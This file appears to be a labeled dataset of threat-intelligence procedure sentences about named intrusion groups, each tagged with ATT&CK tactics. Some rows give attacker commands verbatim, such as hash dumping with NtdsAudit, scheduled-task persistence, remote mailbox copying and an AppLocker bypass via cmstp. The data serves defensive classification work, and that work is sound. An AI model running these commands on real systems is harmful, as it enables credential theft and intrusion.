Carbanak used legitimate programs such as AmmyyAdmin and Team Viewer for remote interactive C2 to target systems.,['TA0011:Command and Control']
Carbanak installs VNC server software that executes through rundll32.,['TA0005:Defense Evasion']
Carbanak has obtained and used open-source tools such as PsExec and Mimikatz.,['TA0042:Resource Development']
Carbanak actors used legitimate credentials of banking employees to perform operations that sent them millions of dollars.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Carbanak malware installs itself as a service to provide persistence and SYSTEM privileges.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Chimera has used gzip for Linux OS and a modified RAR software to archive data on Windows hosts.,['TA0009:Collection']
Chimera has used custom DLLs for continuous retrieval of data from memory.,['TA0009:Collection']
Chimera has used type \\\c$\Users\\Favorites\Links\Bookmarks bar\Imported From IE\*citrix* for bookmark discovery.,['TA0007:Discovery']
Chimera has cleared event logs on compromised hosts.,['TA0005:Defense Evasion']
Chimera has encoded PowerShell commands.,['TA0005:Defense Evasion']
Chimera has used credential stuffing against victim's remote services to obtain valid accounts.,['TA0006:Credential Access']
Chimera has collected credentials for the target organization from previous breaches for use in brute force attacks.,['TA0043:Reconnaissance']
Chimera has used side loading to place malicious DLLs in memory.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Chimera has used Cobalt Strike to encapsulate C2 in DNS traffic.,['TA0011:Command and Control']
Chimera has collected data of interest from network shares.,['TA0009:Collection']
Chimera has has used net user /dom and net user Administrator to enumerate domain accounts including administrator accounts.,['TA0007:Discovery']
Chimera has used compromised domain accounts to gain access to the target environment.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Chimera's malware has altered the NTLM authentication program on domain controllers to allow Chimera to login without a valid credential.,"['TA0006:Credential Access', 'TA0005:Defense Evasion', 'TA0003:Persistence']"
Chimera has nltest /domain_trusts to identify domain trust relationships.,['TA0007:Discovery']
Chimera has used Cobalt Strike C2 beacons for data exfiltration.,['TA0010:Exfiltration']
Chimera has exfiltrated stolen data to OneDrive accounts.,['TA0010:Exfiltration']
"Chimera has used legitimate credentials to login to an external VPN, Citrix, SSH, and other remote services.","['TA0001:Initial Access', 'TA0003:Persistence']"
Chimera has performed file deletion to evade detection.,['TA0005:Defense Evasion']
Chimera has utilized multiple commands to identify data of interest in file and directory listings.,['TA0007:Discovery']
Chimera has remotely copied tools and malware onto targeted systems.,['TA0011:Command and Control']
Chimera has copied tools between compromised hosts using SMB.,['TA0008:Lateral Movement']
Chimera has used net user for account discovery.,['TA0007:Discovery']
Chimera has staged stolen data locally on compromised hosts.,['TA0009:Collection']
"Chimera has harvested data from victim's e-mail including through execution of wmic /node: process call create ""cmd /c copy c:\Users\\\backup.pst c:\windows\temp\backup.pst"" copy ""i:\\\My Documents\.pst"" copy .",['TA0009:Collection']
Chimera has used net localgroup administrators to identify accounts with local administrative rights.,['TA0007:Discovery']
"Chimera has renamed malware to GoogleUpdate.exe and WinRAR to jucheck.exe, RecordedTV.ms, teredo.tmp, update.exe, and msadcs1.exe.",['TA0005:Defense Evasion']
Chimera has registered alternate phone numbers for compromised users to intercept 2FA codes sent via SMS.,['TA0006:Credential Access']
"Chimera has gathered the SYSTEM registry and ntds.dit files from target systems. Chimera specifically has used the NtdsAudit tool to dump the password hashes of domain users via msadcs.exe ""NTDS.dit"" -s ""SYSTEM"" -p RecordedTV_pdmp.txt --users-csv RecordedTV_users.csv and used ntdsutil to copy the Active Directory database.",['TA0006:Credential Access']
Chimera has used direct Windows system calls by leveraging Dumpert.,['TA0002:Execution']
Chimera has used the get -b -e -p command for network scanning as well as a custom Python tool packed into a Windows executable named Get.exe to scan IP ranges for HTTP.,['TA0007:Discovery']
Chimera has used net share and net view to identify network shares of interest.,['TA0007:Discovery']
Chimera has dumped password hashes for use in pass the hash authentication attacks.,"['TA0005:Defense Evasion', 'TA0008:Lateral Movement']"
Chimera has used the NtdsAudit utility to collect information related to accounts and passwords.,['TA0007:Discovery']
Chimera has used multiple password spraying attacks against victim's remote services to obtain valid user and administrator accounts.,['TA0006:Credential Access']
Chimera has used PowerShell scripts to execute malicious payloads and the DSInternals PowerShell module to make use of Active Directory features.,['TA0002:Execution']
Chimera has used tasklist to enumerate processes.,['TA0007:Discovery']
Chimera has encapsulated Cobalt Strike's C2 protocol in DNS and HTTPS.,['TA0011:Command and Control']
Chimera has queried Registry keys using reg query \\\HKU\\SOFTWARE\Microsoft\Terminal Server Client\Servers and reg query \\\HKU\\Software\Microsoft\Windows\CurrentVersion\Internet Settings .,['TA0007:Discovery']
Chimera has staged stolen data on designated servers in the target environment.,['TA0009:Collection']
Chimera has used RDP to access targeted systems.,['TA0008:Lateral Movement']
Chimera has harvested data from remote mailboxes including through execution of \\\c$\Users\\AppData\Local\Microsoft\Outlook*.ost .,['TA0009:Collection']
Chimera has utilized various scans and queries to find domain controllers and remote services in the target environment.,['TA0007:Discovery']
Chimera has used Windows admin shares to move laterally.,['TA0008:Lateral Movement']
"Chimera has used scheduled tasks to invoke Cobalt Strike including through batch script schtasks /create /ru ""SYSTEM"" /tn ""update"" /tr ""cmd /c c:\windows\temp\update.bat"" /sc once /f /st and to maintain persistence.","['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Chimera has used PsExec to deploy beacons on compromised systems.,['TA0002:Execution']
Chimera has collected documents from the victim's SharePoint.,['TA0009:Collection']
"Chimera has used `fsutil fsinfo drives`, `systeminfo`, and `vssadmin list shadows` for system information including shadow volumes and drive information.",['TA0007:Discovery']
"Chimera has used ipconfig, Ping, and tracert to enumerate the IP address and network environment and settings of the local host.",['TA0007:Discovery']
Chimera has used netstat -ano | findstr EST to discover network connections.,['TA0007:Discovery']
Chimera has used the quser command to show currently logged on users.,['TA0007:Discovery']
Chimera has used net start and net use for system service discovery.,['TA0007:Discovery']
Chimera has used time /t and net time \\ip/hostname for system time discovery.,['TA0007:Discovery']
Chimera has used a Windows version of the Linux touch command to modify the date and time stamp on DLLs.,['TA0005:Defense Evasion']
"Chimera has obtained and used tools such as BloodHound, Cobalt Strike, Mimikatz, and PsExec.",['TA0042:Resource Development']
Chimera has used a valid account to maintain persistence via scheduled task.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Chimera has used HTTPS for C2 communications.,['TA0011:Command and Control']
Chimera has used the Windows Command Shell and batch scripts for execution on compromised hosts.,['TA0002:Execution']
Chimera has used WMIC to execute remote commands.,['TA0002:Execution']
Chimera has used WinRM for lateral movement.,['TA0008:Lateral Movement']
Cinnamon Tempest has used search order hijacking to launch Cobalt Strike Beacons.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Cinnamon Tempest has abused legitimate executables to side-load weaponized DLLs.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Cinnamon Tempest has used weaponized DLLs to load and decrypt payloads.,['TA0005:Defense Evasion']
Cinnamon Tempest has obtained highly privileged credentials such as domain administrator in order to deploy malware.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Cinnamon Tempest has uploaded captured keystroke logs to the Alibaba Cloud Object Storage Service, Aliyun OSS.",['TA0010:Exfiltration']
"Cinnamon Tempest has exploited multiple unpatched vulnerabilities for initial access including vulnerabilities in Microsoft Exchange, Manage Engine AdSelfService Plus, Confluence, and Log4j.",['TA0001:Initial Access']
Cinnamon Tempest has maintained leak sites for exfiltrated data in attempt to extort victims into paying a ransom.,['TA0040:Impact']
Cinnamon Tempest has used Group Policy to deploy batch scripts for ransomware deployment.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"Cinnamon Tempest has downloaded files, including Cobalt Strike, to compromised hosts.",['TA0011:Command and Control']
"Cinnamon Tempest has used PowerShell to communicate with C2, download files, and execute reconnaissance commands.",['TA0002:Execution']
Cinnamon Tempest has used the Iox and NPS proxy and tunneling tools in combination create multiple connections through a single tunnel.,['TA0011:Command and Control']
Cinnamon Tempest has used a customized version of the Iox port-forwarding and proxy tool.,['TA0011:Command and Control']
Cinnamon Tempest has used a customized version of the Impacket wmiexec.py module to create renamed output files.,['TA0002:Execution']
Cinnamon Tempest has used SMBexec for lateral movement.,['TA0008:Lateral Movement']
Cinnamon Tempest has deployed ransomware from a batch file in a network share.,['TA0008:Lateral Movement']
"Cinnamon Tempest has used open-source tools including customized versions of the Iox proxy tool, NPS tunneling tool, Meterpreter, and a keylogger that uploads data to Alibaba cloud storage.",['TA0042:Resource Development']
Cinnamon Tempest has used compromised user accounts to deploy payloads and create system services.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Cinnamon Tempest has executed ransomware using batch scripts deployed via GPO.,['TA0002:Execution']
Cinnamon Tempest has used Impacket for lateral movement via WMI.,['TA0002:Execution']
Cinnamon Tempest has created system services to establish persistence for deployed tooling.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Cleaver has used custom tools to facilitate ARP cache poisoning.,"['TA0009:Collection', 'TA0006:Credential Access']"
Cleaver has been known to dump credentials using Mimikatz and Windows Credential Editor.,['TA0006:Credential Access']
"Cleaver has created customized tools and payloads for functions including ARP poisoning, encryption, credential dumping, ASP.NET shells, web backdoors, process enumeration, WMI querying, HTTP and SMB communications, network interface sniffing, and keystroke logging.",['TA0042:Resource Development']
"Cleaver has created fake LinkedIn profiles that included profile photos, details, and connections.",['TA0042:Resource Development']
"Cleaver has obtained and used open-source tools such as PsExec, Windows Credential Editor, and Mimikatz.",['TA0042:Resource Development']
Cobalt Group has used the Plink utility to create SSH tunnels.,['TA0011:Command and Control']
Cobalt Group has bypassed UAC.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Cobalt Group has used the command cmstp.exe /s /ns C:\Users\ADMINI~W\AppData\Local\Temp\XKNqbpzl.txt to bypass AppLocker and launch a malicious script.,['TA0005:Defense Evasion']
"Cobalt Group obfuscated several scriptlets and code used on the victim’s machine, including through use of XOR and RC4.",['TA0005:Defense Evasion']
Cobalt Group has compromised legitimate web browser updates to deliver a backdoor.,['TA0001:Initial Access']
Cobalt Group has used DNS tunneling for C2.,['TA0011:Command and Control']
Cobalt Group has sent malicious Word OLE compound documents to victims.,['TA0002:Execution']
"Cobalt Group had exploited multiple vulnerabilities for execution, including Microsoft’s Equation Editor , an Internet Explorer vulnerability , CVE-2017-8570, CVE-2017-0199, and CVE-2017-8759.",['TA0002:Execution']
Cobalt Group has used exploits to increase their levels of rights and privileges.,['TA0004:Privilege Escalation']
Cobalt Group deleted the DLL dropper from the victim’s machine to cover their tracks.,['TA0005:Defense Evasion']
Cobalt Group has used public sites such as github.com and sendspace.com to upload files and then download them to victim computers. The group's JavaScript backdoor is also capable of downloading files.,['TA0011:Command and Control']
Cobalt Group has executed JavaScript scriptlets on the victim's machine.,['TA0002:Execution']
Cobalt Group has added persistence by registering the file name for the next stage malware under HKCU\Environment\UserInitMprLogonScript.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Cobalt Group has sent emails containing malicious attachments that require users to execute a file or macro to infect the victim machine.,['TA0002:Execution']
Cobalt Group has sent emails containing malicious links that require users to execute a file or macro to infect the victim machine.,['TA0002:Execution']
Cobalt Group leveraged an open-source tool called SoftPerfect Network Scanner to perform network scanning.,['TA0007:Discovery']
Cobalt Group has used odbcconf to proxy the execution of malicious DLL files.,['TA0005:Defense Evasion']
Cobalt Group has used powershell.exe to download and execute scripts.,['TA0002:Execution']
Cobalt Group has injected code into trusted processes.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Cobalt Group has used the Plink utility to create SSH tunnels.,['TA0011:Command and Control']
Cobalt Group has used Registry Run keys for persistence. The group has also set a Startup path to launch the PowerShell shell command and download Cobalt Strike.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Cobalt Group has used regsvr32.exe to execute scripts.,['TA0005:Defense Evasion']
"Cobalt Group used the Ammyy Admin tool as well as TeamViewer for remote access, including to preserve remote access if a Cobalt Strike module was lost.",['TA0011:Command and Control']
Cobalt Group has used Remote Desktop Protocol to conduct lateral movement.,['TA0008:Lateral Movement']
Cobalt Group has created Windows tasks to establish persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Cobalt Group used a JavaScript backdoor that is capable of collecting a list of the security solutions installed on the victim's machine.,['TA0007:Discovery']
"Cobalt Group has sent spearphishing emails with various attachment types to corporate and personal email accounts of victim organizations. Attachment types have included .rtf, .doc, .xls, archives containing LNK files, and password protected archives containing .exe and .scr executables.",['TA0001:Initial Access']
Cobalt Group has sent emails with URLs pointing to malicious documents.,['TA0001:Initial Access']
"Cobalt Group has obtained and used a variety of tools including Mimikatz, PsExec, Cobalt Strike, and SDelete.",['TA0042:Resource Development']
Cobalt Group has sent Word OLE compound documents with malicious obfuscated VBA macros that will run upon user execution.,['TA0002:Execution']
Cobalt Group has used HTTPS for C2.,['TA0011:Command and Control']
Cobalt Group has used a JavaScript backdoor that is capable of launching cmd.exe to execute shell commands. The group has used an exploit toolkit known as Threadkit that launches .bat files.,['TA0002:Execution']
Cobalt Group has created new services to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Cobalt Group used msxsl.exe to bypass AppLocker and to invoke Jscript code from an XSL file.,['TA0005:Defense Evasion']
"Confucius has used a file stealer to steal documents and images with the following extensions: txt, pdf, png, jpg, doc, xls, xlm, odp, ods, odt, rtf, ppt, xlsx, xlsm, docx, pptx, and jpeg.",['TA0009:Collection']
Confucius has exfiltrated stolen files to its C2 server.,['TA0010:Exfiltration']
Confucius has exfiltrated victim data to cloud storage service accounts.,['TA0010:Exfiltration']
"Confucius has exploited Microsoft Office vulnerabilities, including CVE-2015-1641, CVE-2017-11882, and CVE-2018-0802.",['TA0002:Execution']
"Confucius has used a file stealer that checks the Document, Downloads, Desktop, and Picture folders for documents and images with specific extensions.",['TA0007:Discovery']
Confucius has downloaded additional files and payloads onto a compromised host following initial access.,['TA0011:Command and Control']
Confucius has lured victims to execute malicious attachments included in crafted spearphishing emails related to current topics.,['TA0002:Execution']
Confucius has lured victims into clicking on a malicious link sent through spearphishing.,['TA0002:Execution']
Confucius has used mshta.exe to execute malicious VBScript.,['TA0005:Defense Evasion']
Confucius has used PowerShell to execute malicious files and payloads.,['TA0002:Execution']
Confucius has dropped malicious files into the startup folder `%AppData%\Microsoft\Windows\Start Menu\Programs\Startup` on a compromised host in order to maintain persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Confucius has created scheduled tasks to maintain persistence on a compromised host.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Confucius has crafted and sent victims malicious attachments to gain initial access.,['TA0001:Initial Access']
Confucius has sent malicious links to victims through email campaigns.,['TA0001:Initial Access']
"Confucius has used a file stealer that can examine system drives, including those other than the C drive.",['TA0007:Discovery']
Confucius has used a weaponized Microsoft Word document with an embedded RTF exploit.,['TA0005:Defense Evasion']
Confucius has used VBScript to execute malicious code.,['TA0002:Execution']
Confucius has used HTTP for C2 communications.,['TA0011:Command and Control']
Confucius has obtained cloud storage service accounts to host stolen data.,['TA0042:Resource Development']
CopyKittens encrypts data with a substitute cipher prior to exfiltration.,['TA0009:Collection']
"CopyKittens uses ZPP, a .NET console program, to compress files with ZIP.",['TA0009:Collection']
CopyKittens digitally signed an executable with a stolen certificate from legitimate company AI Squared.,['TA0005:Defense Evasion']
CopyKittens has used -w hidden and -windowstyle hidden to conceal PowerShell windows.,['TA0005:Defense Evasion']
CopyKittens has used PowerShell Empire.,['TA0002:Execution']
CopyKittens has used the AirVPN service for operational activity.,['TA0011:Command and Control']
"CopyKittens uses rundll32 to load various tools on victims, including a lateral movement tool named Vminst, Cobalt Strike, and shellcode.",['TA0005:Defense Evasion']
"CopyKittens has used Metasploit, Empire, and AirVPN for post-exploitation activities.",['TA0042:Resource Development']
"Daggerfly has used signed, but not notarized, malicious files for execution in macOS environments.",['TA0005:Defense Evasion']
Daggerfly created code signing certificates to sign malicious macOS files.,['TA0042:Resource Development']
Daggerfly is associated with several supply chain compromises using malicious updates to compromise victims.,['TA0001:Initial Access']
Daggerfly has used legitimate software to side-load PlugX loaders onto victim systems. Daggerfly is also linked to multiple other instances of side-loading for initial loading activity.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Daggerfly has used strategic website compromise for initial access against victims.,['TA0001:Initial Access']
Daggerfly has used PowerShell and BITSAdmin to retrieve follow-on payloads from external locations for execution on victim machines.,['TA0011:Command and Control']
Daggerfly created a local account on victim machines to maintain access.,['TA0003:Persistence']
Daggerfly has used strategic website compromise to deliver a malicious link requiring user interaction.,['TA0002:Execution']
Daggerfly used PowerShell to download and execute remote-hosted files on victim systems.,['TA0002:Execution']
"Daggerfly used Reg to dump the Security Account Manager , System, and Security Windows registry hives from victim machines.",['TA0007:Discovery']
"Daggerfly used a renamed version of rundll32.exe, such as ""dbengin.exe"" located in the `ProgramData\Microsoft\PlayReady` directory, to proxy malicious DLL execution.",['TA0005:Defense Evasion']
Daggerfly proxied execution of malicious DLLs through a renamed rundll32.exe binary.,['TA0005:Defense Evasion']
Daggerfly has attempted to use scheduled tasks for persistence in victim environments.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Daggerfly used Reg to dump the Security Account Manager hive from victim machines for follow-on credential extraction.,['TA0006:Credential Access']
Daggerfly compromised web servers hosting updates for software as part of a supply chain intrusion.,['TA0042:Resource Development']
Daggerfly utilizes victim machine operating system information to create custom User Agent strings for subsequent command and control communication.,['TA0007:Discovery']
Daggerfly uses HTTP for command and control communication.,['TA0011:Command and Control']
Dark Caracal leveraged a compiled HTML file that contained a command to download and run an executable.,['TA0005:Defense Evasion']
Dark Caracal collected complete contents of the 'Pictures' folder from compromised Windows systems.,['TA0009:Collection']
Dark Caracal leveraged a watering hole to serve up malicious code.,['TA0001:Initial Access']
"Dark Caracal has obfuscated strings in Bandook by base64 encoding, and then encrypting them.",['TA0005:Defense Evasion']
Dark Caracal collected file listings of all default Windows directories.,['TA0007:Discovery']
"Dark Caracal makes their malware look like Flash Player, Office, or PDF documents in order to entice a user to click on it.",['TA0002:Execution']
Dark Caracal's version of Bandook adds a registry key to HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Dark Caracal took screenshots using their Windows malware.,['TA0009:Collection']
Dark Caracal has used UPX to pack Bandook.,['TA0005:Defense Evasion']
Dark Caracal spearphished victims via Facebook and Whatsapp.,['TA0001:Initial Access']
Dark Caracal's version of Bandook communicates with their server over a TCP port using HTTP payloads Base64 encoded and suffixed with the string “&&&”.,['TA0011:Command and Control']
Dark Caracal has used macros in Word documents that would download a second stage if executed.,['TA0002:Execution']
DarkHydrus used Template Injection to launch an authentication window for users to enter their credentials.,['TA0006:Credential Access']
DarkHydrus has used -WindowStyle Hidden to conceal PowerShell windows.,['TA0005:Defense Evasion']
DarkHydrus has sent malware that required users to hit the enable button in Microsoft Excel to allow an .iqy file to be downloaded.,['TA0002:Execution']
DarkHydrus leveraged PowerShell to download and execute additional scripts for execution.,['TA0002:Execution']
DarkHydrus has sent spearphishing emails with password-protected RAR archives containing malicious Excel Web Query files . The group has also sent spearphishing emails that contained malicious Microsoft Office documents that use the “attachedTemplate” technique to load a template from a remote server.,['TA0001:Initial Access']
"DarkHydrus used an open-source tool, Phishery, to inject malicious remote template URLs into Microsoft Word documents and then sent them to victims to enable Forced Authentication.",['TA0005:Defense Evasion']
"DarkHydrus has obtained and used tools such as Mimikatz, Empire, and Cobalt Strike.",['TA0042:Resource Development']
DarkVishnya used brute-force attack to obtain login data.,['TA0006:Credential Access']
"DarkVishnya used Bash Bunny, Raspberry Pi, netbooks or inexpensive laptops to connect to the company’s local network.",['TA0001:Initial Access']
DarkVishnya performed port scanning to obtain the list of active services.,['TA0007:Discovery']
DarkVishnya scanned the network for public shared folders.,['TA0007:Discovery']
DarkVishnya used network sniffing to obtain login data.,"['TA0006:Credential Access', 'TA0007:Discovery']"
"DarkVishnya used ports 5190 and 7900 for shellcode listeners, and 4444, 4445, 31337 for shellcode C2.",['TA0011:Command and Control']
DarkVishnya used PowerShell to create shellcode loaders.,['TA0002:Execution']
DarkVishnya used DameWare Mini Remote Control for lateral movement.,['TA0011:Command and Control']
"DarkVishnya has obtained and used tools such as Impacket, Winexe, and PsExec.",['TA0042:Resource Development']
DarkVishnya created new services for shellcode loaders distribution.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Darkhotel has used code-signing certificates on its malware that are either forged due to weak keys or stolen. Darkhotel has also stolen certificates and signed backdoors and downloaders with them.,['TA0005:Defense Evasion']
Darkhotel has decrypted strings and imports using RC4 during execution.,['TA0005:Defense Evasion']
Darkhotel used embedded iframes on hotel login portals to redirect selected victims to download malware.,['TA0001:Initial Access']
"Darkhotel has obfuscated code using RC4, XOR, and RSA.",['TA0005:Defense Evasion']
Darkhotel has exploited Adobe Flash vulnerability CVE-2015-8651 for execution.,['TA0002:Execution']
Darkhotel has used malware that searched for files with specific patterns.,['TA0007:Discovery']
Darkhotel has used first-stage payloads that download additional malware from C2 servers.,['TA0011:Command and Control']
Darkhotel has used a keylogger.,"['TA0009:Collection', 'TA0006:Credential Access']"
Darkhotel has sent spearphishing emails in an attempt to lure users into clicking on a malicious attachments.,['TA0002:Execution']
Darkhotel has used malware that is disguised as a Secure Shell tool.,['TA0005:Defense Evasion']
Darkhotel malware can collect a list of running processes on a system.,['TA0007:Discovery']
Darkhotel has been known to establish persistence by adding programs to the Run Registry key.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Darkhotel's selective infector modifies executables stored on removable media as a method of spreading across computers.,"['TA0001:Initial Access', 'TA0008:Lateral Movement']"
Darkhotel has searched for anti-malware strings and anti-virus processes running on the system.,['TA0007:Discovery']
Darkhotel has sent spearphishing emails with malicious RAR and .LNK attachments.,['TA0001:Initial Access']
Darkhotel has used AES-256 and 3DES for C2 communications.,['TA0011:Command and Control']
"Darkhotel malware has used a series of checks to determine if it's being analyzed; checks include the length of executable names, if a filename ends with .Md5.exe, and if the program is executed from the root of the C:\ drive, as well as checks for sandbox-related libraries.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
"Darkhotel has collected the hostname, OS version, service pack version, and the processor architecture from the victim’s machine.",['TA0007:Discovery']
Darkhotel has collected the IP address and network adapter information from the victim’s machine.,['TA0007:Discovery']
Darkhotel malware can obtain system time from a compromised host.,['TA0007:Discovery']
Darkhotel used a virus that propagates by infecting executables stored on shared drives.,['TA0008:Lateral Movement']
Darkhotel has used malware that repeatedly checks the mouse cursor position to determine if a real user is on the system.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Darkhotel malware has employed just-in-time decryption of strings to evade sandbox detection.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Darkhotel has dropped an mspaint.lnk shortcut to disk which launches a shell script that downloads and executes a file.,['TA0002:Execution']
Deep Panda has used the sticky-keys technique to bypass the RDP login screen on remote systems during intrusions.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Deep Panda has used -w hidden to conceal PowerShell windows by setting the WindowStyle parameter to hidden.,['TA0005:Defense Evasion']
"Deep Panda has updated and modified its malware, resulting in different hash values that evade detection.",['TA0005:Defense Evasion']
"Deep Panda has used PowerShell scripts to download and execute programs in memory, without writing to disk.",['TA0002:Execution']
Deep Panda uses the Microsoft Tasklist utility to list processes running on systems.,['TA0007:Discovery']
Deep Panda has used regsvr32.exe to execute a server variant of Derusbi in victim networks.,['TA0005:Defense Evasion']
Deep Panda has used ping to identify other machines of interest.,['TA0007:Discovery']
Deep Panda uses net.exe to connect to network shares using net use commands with compromised credentials.,['TA0008:Lateral Movement']
Deep Panda uses Web shells on publicly accessible Web servers to access victim networks.,['TA0003:Persistence']
The Deep Panda group is known to utilize WMI for lateral movement.,['TA0002:Execution']
Dragonfly has added newly created accounts to the administrators group to maintain elevated access.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Dragonfly has compressed data into .zip files prior to exfiltration.,['TA0009:Collection']
Dragonfly has attempted to brute force credentials to gain access.,['TA0006:Credential Access']
Dragonfly has collected open source information to identify relationships between organizations for targeting purposes.,['TA0043:Reconnaissance']
"Dragonfly has cleared Windows event logs and other logs produced by tools they used, including system, security, terminal services, remote services, and audit logs. The actors also deleted specific Registry keys.",['TA0005:Defense Evasion']
Dragonfly has used the command line for execution.,['TA0002:Execution']
Dragonfly has placed trojanized installers for control system software on legitimate vendor app stores.,['TA0001:Initial Access']
Dragonfly has collected data from local victim systems.,['TA0009:Collection']
Dragonfly has disabled host-based firewalls. The group has also globally opened port 3389.,['TA0005:Defense Evasion']
Dragonfly has used batch scripts to enumerate users on a victim domain controller.,['TA0007:Discovery']
Dragonfly has used batch scripts to enumerate administrators and users in the domain.,['TA0007:Discovery']
Dragonfly has registered domains for targeting intended victims.,['TA0042:Resource Development']
Dragonfly has compromised targets via strategic web compromise utilizing a custom exploit kit.,['TA0001:Initial Access']
Dragonfly has compromised websites to redirect traffic and to host exploit kits.,['TA0042:Resource Development']
"Dragonfly has conducted SQL injection attacks, exploited vulnerabilities CVE-2019-19781 and CVE-2020-0688 for Citrix and MS Exchange, and CVE-2018-13379 for Fortinet VPNs.",['TA0001:Initial Access']
Dragonfly has exploited CVE-2011-0611 in Adobe Flash Player to gain execution on a targeted system.,['TA0002:Execution']
Dragonfly has exploited a Windows Netlogon vulnerability to obtain access to Windows Active Directory servers.,['TA0008:Lateral Movement']
Dragonfly has used VPNs and Outlook Web Access to maintain access to victim networks.,"['TA0001:Initial Access', 'TA0003:Persistence']"
"Dragonfly has deleted many of its files used during operations as part of cleanup, including removing applications and deleting screenshots.",['TA0005:Defense Evasion']
Dragonfly has used SMB for C2.,['TA0011:Command and Control']
Dragonfly has used a batch script to gather folder and file names from victim hosts.,['TA0007:Discovery']
Dragonfly has gathered hashed user credentials over SMB using spearphishing attachments with external resource links and by modifying .LNK file icon resources to collect credentials from virtualized systems.,['TA0006:Credential Access']
Dragonfly has modified the Registry to hide created user accounts.,['TA0005:Defense Evasion']
Dragonfly has copied and installed tools for operations once in the victim environment.,['TA0011:Command and Control']
Dragonfly has dropped and executed SecretsDump to dump password hashes.,['TA0006:Credential Access']
"Dragonfly has created accounts on victims, including administrator accounts, some of which appeared to be tailored to each individual staging target.",['TA0003:Persistence']
"Dragonfly has created a directory named ""out"" in the user's %AppData% folder and copied files to it.",['TA0009:Collection']
Dragonfly has used various forms of spearphishing in attempts to get users to open malicious attachments.,['TA0002:Execution']
Dragonfly has created accounts disguised as legitimate backup and service accounts as well as an email administration account.,['TA0005:Defense Evasion']
Dragonfly has modified the Registry to perform multiple techniques through the use of Reg.,['TA0005:Defense Evasion']
Dragonfly has dropped and executed SecretsDump to dump password hashes. They also obtained ntds.dit from domain controllers.,['TA0006:Credential Access']
"Dragonfly has identified and browsed file servers in the victim network, sometimes , viewing files pertaining to ICS or Supervisory Control and Data Acquisition systems.",['TA0007:Discovery']
"Dragonfly has dropped and executed tools used for password cracking, including Hydra and CrackMapExec.",['TA0006:Credential Access']
Dragonfly has used PowerShell scripts for execution.,['TA0002:Execution']
"Dragonfly has used various types of scripting to perform operations, including Python scripts. The group was observed installing Python 2.7 on a victim.",['TA0002:Execution']
Dragonfly has queried the Registry to identify victim information.,['TA0007:Discovery']
Dragonfly has added the registry value ntdll to the Registry Run key to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Dragonfly has moved laterally via RDP.,['TA0008:Lateral Movement']
Dragonfly has accessed email accounts using Outlook Web Access.,['TA0009:Collection']
Dragonfly has likely obtained a list of hosts in the victim environment.,['TA0007:Discovery']
Dragonfly has used scheduled tasks to automatically log out of created accounts every 8 hours as well as to execute malicious files.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Dragonfly has performed screen captures of victims, including by using a tool, scr.exe .",['TA0009:Collection']
Dragonfly has dropped and executed SecretsDump to dump password hashes.,['TA0006:Credential Access']
Dragonfly has compromised legitimate websites to host C2 and malware modules.,['TA0042:Resource Development']
Dragonfly has sent emails with malicious attachments to gain initial access.,['TA0001:Initial Access']
Dragonfly has used spearphishing with Microsoft Office attachments to enable harvesting of user credentials.,['TA0043:Reconnaissance']
Dragonfly has used spearphishing with PDF attachments containing malicious links that redirected to credential harvesting websites.,['TA0043:Reconnaissance']
"Dragonfly has used batch scripts to enumerate network information, including information about trusts, zones, and the domain.",['TA0007:Discovery']
Dragonfly used the command query user on victim hosts.,['TA0007:Discovery']
Dragonfly has injected SMB URLs into malicious Word spearphishing attachments to initiate Forced Authentication.,['TA0005:Defense Evasion']
"Dragonfly has obtained and used tools such as Mimikatz, CrackMapExec, and PsExec.",['TA0042:Resource Development']
Dragonfly has compromised user credentials and used valid accounts for operations.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Dragonfly has acquired VPS infrastructure for use in malicious campaigns.,['TA0042:Resource Development']
Dragonfly has scanned targeted systems for vulnerable Citrix and Microsoft Exchange services.,['TA0043:Reconnaissance']
"Dragonfly has commonly created Web shells on victims' publicly accessible email and web servers, which they used to maintain access to a victim network and download additional malicious files.",['TA0003:Persistence']
"Dragonfly has used various types of scripting to perform operations, including batch scripts.",['TA0002:Execution']
